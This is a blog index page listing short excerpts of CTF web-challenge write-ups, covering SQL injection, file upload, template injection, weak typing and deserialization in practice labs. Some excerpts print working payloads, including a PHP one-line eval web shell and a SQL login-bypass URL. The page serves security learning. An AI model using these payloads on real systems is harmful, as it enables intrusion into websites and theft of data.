WeQi_Blog - 博客园

2021年8月30日

摘要： 1.发现 1.题目提示为简单的JS，打开题目地址，提示flag和url有关，检查源代码发现，一串JS代码。 2.步骤 2.发现部分代码使用Ascii，直接在浏览器中运行一下（注意代码中的空格），发现新页面的出现一个点。 3.查看代码元素，发现一个PHP链接。 4.打开链接，提示flag is fla 阅读全文

posted @ 2021-08-30 16:03 WeQi_Blog 阅读(43) 评论(0) 推荐(0)

2021年8月24日

模块一：Web基础-GG

摘要： 1.发现 1.打开题目地址，发现是个俄罗斯方块的游戏，可以尝试先玩几局游戏，但是并没有什么用 2.我们无法或者是很难很费劲能够直接从游戏获得flag，所以我们先分析这个游戏服务：我们在浏览器的开发者工具中，对网络请求进行分析。 2.步骤 1.发现我们对目标进行访问时，并没有实质性的后台请求，所以及阅读全文

posted @ 2021-08-24 19:50 WeQi_Blog 阅读(82) 评论(0) 推荐(0)

模块一：Web基础-捉迷藏

摘要： 1.发现 1.查看源代码，发现被覆盖文件。 2.步骤 1.查看元素，并修改属性，点击发现页面闪了一下。 2.用bp抓包，得到flag。阅读全文

posted @ 2021-08-24 17:19 WeQi_Blog 阅读(63) 评论(0) 推荐(0)

2021年8月20日

[BJDCTF2020]Easy MD5 1

摘要： 1.发现 1.1先查看源代码，随便注入，都无果，bp抓包，发现SQ语句 Hint: select * from 'admin' where password=md5($pass,true) 知识点： 1）PHP中MD5函数 2.步骤 2.1 利用md5($password,true)实现SQL注入，阅读全文

posted @ 2021-08-20 08:57 WeQi_Blog 阅读(366) 评论(0) 推荐(0)

[HCTF 2018]admin 1

摘要： 1.发现 1.1将每个界面源代码看一遍，发现提示要注册登录。 1.2注册登录后查看各节目源代码，发现一个提示，后面用到。 1.3 在change源代码中，发现提示，下载文件。 1.4 通过第一个提示打开下载文件中的index.html文件，分析代码，发现如果session等于admin就出hctf{ 阅读全文

posted @ 2021-08-20 05:35 WeQi_Blog 阅读(636) 评论(0) 推荐(0)

2021年8月19日

[ACTF2020 新生赛]BackupFile 1

摘要： 1.发现 1.1 扫描后台，发现后台文件。 1.2 下载后台文件并分析代码，发现为弱类型绕过。 <?php include_once "flag.php";//包含flag文件 if(isset($_GET['key'])) {//获取key参数 $key = $_GET['key']; if(!i 阅读全文

posted @ 2021-08-19 22:02 WeQi_Blog 阅读(243) 评论(0) 推荐(0)

[极客大挑战 2019]BabySQL 1

摘要： 1.发现 1.1随便输入，查看结果。 1.2使用万能密码，登录失败。 /check.php?username=admin' or '1'='1&password=1 知识点： 1）万能密码绕过 1.3 尝试注释掉password内容，登陆成功。 /check.php?username=admin' 阅读全文

posted @ 2021-08-19 21:39 WeQi_Blog 阅读(368) 评论(0) 推荐(0)

[护网杯 2018]easy_tornado 1

摘要： 1.发现 1.1打开三个目录为一下内容。发现为模板注入.搜素百度得Tornado框架的附属文件handler.settings中存在cookie_secret flag in /fllllllllllllag render md5(cookie_secret+md5(filename)) 知识点：阅读全文

posted @ 2021-08-19 17:50 WeQi_Blog 阅读(164) 评论(0) 推荐(0)

[ACTF2020 新生赛]Upload 1

摘要： 1.发现 1.1文件上传漏洞常规思路 1.2构造一句话木马 <?php @eval($_POST['666']);?> 1.3上传一句话木马,发现前端：JS检验文件后缀–白名单机制： 1.4顺势而为，顺藤摸瓜搞清后台： ==》老套路，前端上传1.jpg==》burp抓包 ==》 success，查阅读全文

posted @ 2021-08-19 16:49 WeQi_Blog 阅读(610) 评论(0) 推荐(0)

[极客大挑战 2019]PHP 1

摘要： 1.发现 1.1扫描后台目录，发现www.zip 知识点： 1）后台扫描工具：御剑、dirsearch 1.2打开压缩包，发现flag文件没有用，index.php文件中使用了反序列化。知识点： 1）序列化与反序列化 1.3 分析class.php代码，根据代码的意思，我们可以发现如果userna 阅读全文

posted @ 2021-08-19 15:50 WeQi_Blog 阅读(439) 评论(0) 推荐(0)